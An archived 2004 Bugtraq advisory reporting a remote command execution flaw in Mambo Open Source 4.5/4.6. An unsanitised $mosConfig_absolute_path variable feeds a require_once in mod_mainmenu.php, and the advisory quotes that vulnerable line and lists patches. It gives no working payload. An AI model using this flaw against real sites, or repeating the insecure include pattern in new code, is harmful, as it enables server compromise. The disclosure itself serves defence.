lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000901c3dde9$80d11390$0202a8c0@angie>
Date: Sun, 18 Jan 2004 18:21:15 +0100
From: "FraMe" <frame@...palab.com>
To: <bugtraq@...urityfocus.com>
Subject: Mambo OS v4.5/v4.6: remote command execution


Product: Mambo Open Source v4.5
              Mambo Open Source v4.6 (CVS)
Vendor: Miro International Pty Ltd.
Author: FraMe ( frame at kernelpanik.org )
URL: http://www.kernelpanik.org

CONTENTS

1. Overview
2. Description.
3. Details
4. Patches.

1. Overview.

Mambo Open Source is an, open source, modular, web content management
system (CMS), written in Php with a MySql database in backend.

More info: http://www.mamboserver.com

2. Description.

Mambo OS allow remote command execution in ./modules/mod_mainmenu.php
Anybody can inject a url in $mosConfig_absolute_path and obtain command
execution
with web server privileges ( usually nobody ).

3. Details.

Mambo OS v4.5 and v4.6
from ./modules/mod_mainmenu.php:
================================

<?php

(..)

// $module is defined in the calling function
// $params is defined in the calling function

require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

(..)
?>


4. Patches

a) Php globals off (Default in Php > 4.2)

b) Unofficial patch for mod_mainmenu.php can be downloaded from:
     http://www.kernelpanik.org/code/kernelpanik/mambo.zip

==============================
[ FraMe - frame at kernelpanik.org ]
[ URL - http://frame.lifefromthenet.com ]
[ Kernelpanik - http://www.kernelpanik.org ]
[ PGP KeyID - 0xFA81AC9C ]
==============================


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ